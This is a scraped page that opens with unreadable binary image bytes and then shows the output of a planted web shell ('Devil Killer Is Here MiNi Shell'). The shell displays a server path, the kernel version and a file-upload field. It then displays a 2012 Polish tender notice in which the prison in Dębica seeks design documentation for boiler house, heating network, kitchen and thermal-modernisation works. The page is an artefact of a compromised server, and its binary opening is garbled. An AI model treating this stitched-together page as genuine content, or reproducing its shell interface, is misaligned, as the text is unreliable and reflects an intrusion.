JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20120207/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20120207/36952-N-2012.html

<p class="kh_header"><b>Dębica: przetarg nieograniczony  na wykonanie Kompletnej dokumentacji projektowej dla Zakładu Karnego w Dębicy,</b><br>
<b>Numer ogłoszenia: 36952 - 2012; data zamieszczenia: 07.02.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Zakład Karny , ul. Sandomierska 41, 39-200 Dębica, woj. podkarpackie, tel. 0-14 681-56-56, 681-56-57, faks 0-14 681-56-59.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.sw.gov.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Organ kontroli państwowej lub ochrony prawa, sąd lub trybunał.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> przetarg nieograniczony  na wykonanie Kompletnej dokumentacji projektowej dla Zakładu Karnego w Dębicy,.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1. Przedmiotem zamówienia jest wykonanie dokumentacji i czynności:
 1.1  Po zaakceptowaniu przez inwestora  kompletnej dokumentacji projektowej składającej się z:
 1.1.1    Projektu budowlano-wykonawczego w pełnym zakresie realizacji o którym mowa  w pkt. 2, 3. Projekt powinien zawierać: 
 1.1.1.1  Inwentaryzację ( w razie potrzeby).
 1.1.1.2  Ekspertyzy budowlane ( w razie potrzeby).
 1.1.1.3  Projekt zagospodarowania terenu.
 1.1.1.4  Badania geologiczne podłoża gruntowego (w razie potrzeby).
 1.1.1.5  Projekt architektoniczny. Zakład Karny posiada aktualną mapę do celów projektowych oraz warunki przyłączenia do sieci gazowej. Na całość inwestycji nie są wymagane warunki zabudowy i zagospodarowania terenu.
 1.1.1.6  Projekt konstrukcyjny.
 1.1.1.7  Projekt wszystkich instalacji i sieci.
 1.1.1.8  Informację BIOZ.

 1.1.2  Specyfikacji technicznych wykonania i odbioru robót w pełnym zakresie realizacji 
                 o którym mowa  w pkt.  2.
 1.1.3  Audytów energetycznych obejmujących pełen zakres realizacji o którym mowa  
              w pkt.  2.
 1.1.4  Kosztorysu inwestorskiego w pełnym zakresie realizacji o którym mowa
                 w pkt.  2.
 1.1.5  Studium wykonalności  wraz z wszystkimi niezbędnymi załącznikami obejmujące pełen zakres realizacji  o którym mowa w pkt. 3 ppkt. 3.2 dla projektu z zakresu termomodernizacji, zmiany źródeł wytwarzania  energii i modernizacji obiektu spalania paliw  pt. /Poprawa wydajności energetycznej  Zakładu Karnego w Dębicy./ w ramach Regionalnego Programu Operacyjnego Województwa Podkarpackiego, działanie 2.2 Infrastruktura energetyczna.
 1.1.6  Studium wykonalności wraz z wszystkimi niezbędnymi załącznikami obejmujące pełen zakres realizacji  o którym mowa w pkt. 3 ppkt. 3.3   dla projektu z zakresu odnawialnych źródeł energii  pt. /Poprawa  wydajności energetycznej Zakładu Karnego w Dębicy./ w ramach Regionalnego Programu Operacyjnego Województwa Podkarpackiego, działanie 2.2 Infrastruktura energetyczna.
 1.2  Uzyskanie wymaganych przepisami opinii, uzgodnień, zgłoszeń, pozwoleń, w tym pozwolenia na budowę niezbędnych do rozpoczęcia robót budowlanych obejmujące pełen zakres realizacji  o którym mowa w pkt. 2.
 1.3  Przygotowanie wniosku o dofinansowanie projektu wraz z wszystkimi niezbędnymi załącznikami -  z zakresu termomodernizacji, zmiany źródeł energii wytwarzania energii i modernizacji obiektu spalania paliw pt. /Poprawa wydajności energetycznej Zakładu Karnego w Dębicy./ w ramach Regionalnego Programu Operacyjnego Województwa Podkarpackiego, działanie 2.2 Infrastruktura energetyczna,  o którym mowa w pkt. 3 ppkt. 3.2.
 1.4  Przygotowanie wniosku o dofinansowanie projektu wraz z wszystkimi niezbędnymi załącznikami - z zakresu odnawialnych źródeł energii  pt. /Poprawa wydajności energetycznej Zakładu Karnego w Dębicy./ w ramach Regionalnego Programu Operacyjnego Województwa Podkarpackiego, działanie 2.2 Infrastruktura energetyczna,  o którym mowa w pkt. 3 ppkt. 3.3.
 1.5  Pełnienie nadzoru autorskiego przez cały okres wykonywania robót budowlanych.

 2  Przedmiot zamówienia określony w pkt. 1 służyć ma wykonaniu niżej wymienionego zakresu rzeczowego:
 2.1  Przebudowa kotłowni miałowej na gazową z całą infrastrukturą techniczną sterowaniem i automatyką. Moc kotłowni  ma wynikać z audytu energetycznego i wyliczeń zapotrzebowania na ciepło. Do wytworzenie centralnego ogrzewania i ciepłej wody użytkowej przewiduje się  zastosowanie dwóch kotłów grzewczych. Podstawową jednostką ma być kocioł gazowy kondensacyjny a rezerwowym źródłem ma być kocioł gazowo-olejowy. Do celów technologicznych przewiduje się piec gazowy parowy lub gazową wytwornicę pary. Cele technologiczne obejmują dostarczanie pary do budynku pralni. Wytwarzanie ciepłej wody użytkowej poprzez piec gazowy musi być zintegrowane z projektowanym wykorzystaniem odnawialnego źródła energii w postaci kolektorów słonecznych. Infrastruktura kotłowni ma być wyposażona w stacje uzdatniania wody i magazyn na olej opałowy. Projektowana kotłownia gazowa powstanie w budynku kotłowni miałowej po uprzednim jego zmodernizowaniu. Modernizacja będzie obejmować między innymi demontaż wszystkich urządzeń , które są zbędne dla nowej kotłowni, termomodernizację przegród zewnętrznych, wymianę stolarki okiennej, przeprojektowanie pomieszczeń zgodnie z sugestiami zamawiającego, dostosowanie obiektu do nowych warunków, budowę kominów, budowę instalacji gazowej, wymianę pozostałych instalacji (jeśli zajdzie taka konieczność), wykończenie pomieszczeń kotłowni. Modernizacja i dostosowanie kotłowni do nowych warunków nie może powodować zakłóceń pracy kotłowni istniejącej do momentu przejścia na nowy system ogrzewania. Dlatego demontaż urządzeń musi być zaprojektowany stopniowo, a całkowity demontaż wraz z dokończeniem modernizacji odbędzie się po przejściu na nowe źródło zasilania.
 2.2  Budowa nowych zewnętrznych sieci cieplnych obejmujących cały teren jednostki  oraz instalacji gazowej na odcinkach od stacji redukcyjno-pomiarowej do punktów poboru gazu. Sieci ciepłownicze składają się z: centralnego ogrzewania, ciepłej wody użytkowej, pary technologicznej. Średnice rur oraz grubość ocieplenia mają wynikać z obliczeń i audytu energetycznego. Zakłada się zastosowanie rur preizolowanych. Po budowie nowych sieci przewiduje się demontaż starych. W przypadku pary technologicznej przewiduje się powrót kondensatu, który będzie wykorzystywany do ponownego napełniania pieców. Sieć ciepłej wody użytkowej musi być wyposażona w cyrkulację sterowaną. Budowa nowych sieci nie może zakłócać pracy starych do momentu przejścia na nowy system.
 2.3  Modernizacja kuchni w części przygotowania posiłków. Modernizacja ma obejmować: instalację nowych kotłów i urządzeń gastronomicznych ogrzewanych gazowo przy czym należy przewidzieć, że część urządzeń musi być dostosowana do ogrzewania energią elektryczną na wypadek przerw w dostawie gazu, wykonanie nowych okładzin podłogowych i ściennych, wymaganych kominów i wentylacji mechanicznej, wykonanie odwodnień, wymiana instalacji elektrycznej, budowa instalacji gazowej. Instalacja nowych urządzeń nie może zakłócać pracy kuchni. Całkowity demontaż instalacji nastąpi po przejściu na nowy system.
 2.4  Termomodernizacja 13 obiektów Zakładu Karnego obejmującą docieplenie przegród zewnętrznych, wymianę stolarki okiennej i drzwiowej (tam gdzie wymagane) oraz wymianę wewnętrznych instalacji centralnego ogrzewania i ciepłej wody użytkowej. W/w termomodernizacja dotyczy następujących obiektów: pawilon A, pawilon B, pawilon C, kuchnia, wartownia, magazyn, pralnia, warsztaty, administracja, kotłownia, budynek gospodarczy, wieżyczka strażnicza I. Grubość ocieplenia ma wynikać z audytu energetycznego. Roboty termomodernizacyjne będą obejmować również wymianę krat okiennych, parapetów, obróbek blacharskich i przerobienie orynnowania.
 2.5  Budowę odnawialnego źródła energii w postaci kolektorów słonecznych wspomagających wytworzenie ciepłej wody użytkowej. Lokalizacja baterii kolektorów zakładana jest na dachu budynku pralni (do uzgodnienia). Kolektory słoneczne mają być zintegrowane z wymiennikami cieplnymi kotłowni.

 3  Zastosowane rozwiązania projektowe powinny być wyważone ekonomicznie, gwarantujące tanią i bezawaryjną eksploatację oraz muszą być dostosowane do realiów panujących w Zakładzie Karnym.  Propozycje opracowanych przez Wykonawcę rozwiązań projektowych będą wymagały akceptacji Zamawiającego.
 3.1   Szczegółowe rozwiązania techniczne przedmiotu zamówienia należy zaprojektować zgodnie z wymogami przepisów szczególnych w tym techniczno-budowlanych, Polskimi Normami, w sposób zapewniający spełnienie wymogów określonych w art.5 ustawy z dnia 7 lipca 1994r. Prawo budowlane (Dz.U z 2010 r. Nr 243, poz. 1623) oraz Zarządzenia nr 60/2010 Dyrektora Generalnego Służby Więziennej z dnia 3.09.2010 r. w sprawie ustalenia metod gospodarowania paliwami i energią w jednostkach organizacyjnych Służby Więziennej.Opracowania stanowiące przedmiot zamówienia winny być wykonane zgodnie z obowiązującymi przepisami prawa, w szczególności zgodnie z Rozporządzeniem Ministra Infrastruktury z dnia 2 września 2004r. w sprawie szczegółowego zakresu i formy dokumentacji projektowej, specyfikacji technicznych wykonania i odbioru robót budowlanych oraz programu funkcjonalno-użytkowego ( Dz.U. z 2004r. Nr 202, poz.2072),Rozporządzeniem Ministra Infrastruktury z dnia 3 lipca 2003 r. w sprawie szczegółowego zakresu i formy projektu budowlanego ( Dz.U. z 2003r. Nr 120, poz.1133), Rozporządzeniem Ministra Infrastruktury z dnia 18 maja 2004r. w sprawie określenia metod i podstaw sporządzania kosztorysu inwestorskiego, obliczania planowanych kosztów prac projektowych oraz planowanych kosztów robót budowlanych określonych w programie funkcjonalno-użytkowym, Rozporządzeniem Ministra Infrastruktury z dnia 17 marca 2009 r. w sprawie szczegółowego zakresu i form audytu energetycznego oraz części audytu remontowego, wzorów kart audytów, a także algorytmu oceny opłacalności przedsięwzięcia termomodernizacyjnego (Dz.U. 2009 nr 43 poz. 346).
 3.2  Wykonanie Studium wykonalności oraz Przygotowanie wniosku o dofinansowanie projektu z zakresu termomodernizacji, zmiany źródeł  wytwarzania energii i modernizacji obiektu spalania paliw pt./Poprawa wydajności energetycznej Zakładu Karnego w Dębicy./ w ramach Regionalnego Programu Operacyjnego Województwa Podkarpackiego, działanie 2.2 Infrastruktura energetyczna ma obejmować zakres o którym mowa  w pkt.  2 ppkt. 2.1, 2.2, 2.3, 2.4  i być zgodne   z wytycznymi  Regionalnego Programu Operacyjnego Województwa Podkarpackiego w sprawie wykonywania studium wykonalności z zakresu energetyki i ciepłownictwa i sporządzania wniosków o dofinansowanie prezentowanymi na stronie internetowej http://www.rpo.podkarpackie.pl.
 3.3  Wykonanie Studium wykonalności oraz Przygotowanie wniosku o dofinansowanie projektu z zakresu odnawialnych źródeł energii pt./Poprawa wydajności energetycznej Zakładu Karnego w Dębicy./ w ramach Regionalnego Programu Operacyjnego Województwa Podkarpackiego, działanie 2.2 Infrastruktura energetyczna ma obejmować zakres o którym mowa  w pkt. 2 ppkt.  2.5 i być zgodne   z wytycznymi  Regionalnego Programu Operacyjnego Województwa Podkarpackiego w sprawie wykonywania studium wykonalności z zakresu energetyki i ciepłownictwa i sporządzania wniosków o dofinansowanie prezentowanymi na stronie internetowej http://www.rpo.podkarpackie.pl.
 4   Wykonawca przekaże przedmiot zamówienia, o którym mowa w pkt. 1 ppkt 1.1, 1.2, 1.3, 1.4   w terminie do 15 lipca 2012 r. Przedmiot zamówienia ma zostać wykonany:
 4.1  Wersja papierowa  całości przedmiotu zamówienia - 4 egz.
 4.2  Wersja elektroniczna  całości przedmiotu zamówienia na płycie CD w formacie .PDF - 2 egz.
 4.3  Wersja elektroniczna wszystkich rysunków na płycie CD w formacie .DWG -   2 egz.


 5  Wszelkie prace projektowe lub czynności nie opisane w niniejszym rozdziale, a niezbędne do właściwego i kompletnego opracowania dokumentacji projektowej, uzyskania niezbędnych uzgodnień oraz decyzji należy traktować jako oczywiste i uwzględnić w kosztach i terminach wykonania przedmiotu zamówienia. Zamawiający dodatkowo informuje, iż posiada w części nieaktualną dokumentacje projektową opracowaną w latach 70-tych XX-wieku, której elementy może udostępnić jako materiał pomocniczy do wykorzystania w trakcie realizacji niniejszego zamówienia..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 71.00.00.00-8.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 15.07.2012.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> 1. Warunkiem udziału w postępowaniu jest wniesienie wadium.  
2. Wysokość wadium  wynosi 5.000,00zł. ( słownie: pięć tysięcy zł. 00/100).</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>oświadczenie o spełnianiu warunków udziału w postępowaniu</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>1) oświadczenie o spełnianiu warunków udziału w postępowaniu
2) zrealizował ( zakończył ) co najmniej 2 dokumentacje projektowe obejmujące projekt budowlano-wykonawczy, z zakresu instalacji sanitarnych o łącznej wartości co najmniej 50.000,00 zł. każdy, w ciągu ostatnich trzech lat.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>1) oświadczenie o spełnianiu warunków udziału w postępowaniu</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>1) oświadczenie o spełnianiu warunków udziału w postępowaniu</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>1) oświadczenie o spełnianiu warunków udziału w postępowaniu
2) dysponują środkami finansowymi lub posiadają zdolność kredytową w wysokości co najmniej 50.000,00 zł</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

<li  style="margin-bottom: 12px;">informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej, w których wykonawca posiada rachunek, potwierdzającą wysokość posiadanych środków finansowych lub zdolność kredytową wykonawcy, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li id="potwierdzenia_info"><p>Wykonawca powołujący się przy wykazywaniu spełnienia warunków udziału w postępowaniu na zdolność finansową innych podmiotów, przedkłada informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej, dotyczącą podmiotu, z którego zdolności finansowej korzysta na podstawie art. 26 ust. 2b ustawy, potwierdzającą wysokość posiadanych przez ten podmiot środków finansowych lub jego zdolność kredytową, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert.</p></li>
<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków  lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 9 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li style="margin-right: 20px;"><p class="justify"><span class="bold">III.4.3.2)</span> zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert - albo oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio miejsca zamieszkania osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, jeżeli w miejscu zamieszkania osoby lub w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się takiego zaświadczenia</p></li></ul>

<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>nie</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.sw.gov.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Zakład Karny 
ul. Sandomierska 41,
39-200 Dębica.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 21.02.2012 godzina 09:00, miejsce: Zakład Karny 
ul. Sandomierska 41,
 39-200 Dębica.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> do 21.03.2012.</p>





